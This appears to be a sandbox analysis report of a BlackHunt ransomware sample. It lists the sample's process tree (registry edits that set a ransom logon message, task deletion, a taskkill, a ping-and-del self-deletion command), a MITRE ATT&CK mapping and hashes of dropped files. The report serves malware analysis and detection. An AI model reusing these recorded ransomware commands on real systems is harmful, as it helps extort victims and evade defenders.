C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:8816
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:8648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:8608
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:8724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:8824
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:4792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:9208
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:4692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:8940
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:8656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:224
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:8680 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:6312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 14524⤵
- Program crash
PID:3628
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:6648
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2928
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe"2⤵PID:4168
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:6096
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:996
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:316
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:5776
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:1132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 63121⤵PID:4848
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c2e835b338b7b396c6009c7ac407889f
SHA19ddb9d0515711b9bffc83db8eb3d8b586ecd2ad4
SHA2560b90b723ac8eb03706c81538e3de9294cfaee3485338215b568e2b725436e37e
SHA51242ad3674a3bab5261d7b0617f8b5eea28fe3a10bc27c1527453ea2d220be20f9877e59dcc9a132d197705331ddb4ee9f0bab6a5daafbb6ec0e5e448cc4fe4276
-
Filesize
12KB
MD5369116dd1b66ec02dda47ca15ecbb0cf
SHA191ffa9c40819270936676fd6d763cad0bb69a0ca
SHA256cfd6a011ee369757888cffae612f0b37918bd62bf96d4c48da504b7cdab4d015
SHA512d4088cf2785337281983a8800101597c543676c2508f52769b4d3a12b34450b8ccd1ed44af167c576e0cc2185c16d7f33b54dbfd7716440f234ac0ae0d8d5f8f
-
Filesize
684B
MD584c11b7d11256ae8b565c2b05a84b2cc
SHA17a51171d221e19f31a244b1f22ea9d0d3915b535
SHA2563fe8a7e7be827863f552c500445bafeb2cb98de02dad6ee3db020dacc0a019d7
SHA512a53f48a92545024aa331cfe499d002142b785f8e25520e468923930521a3e3ab0579fbec3311fa04cf3b05f35acc34f287e79cc9dd759d35e58bd8c90993a1d4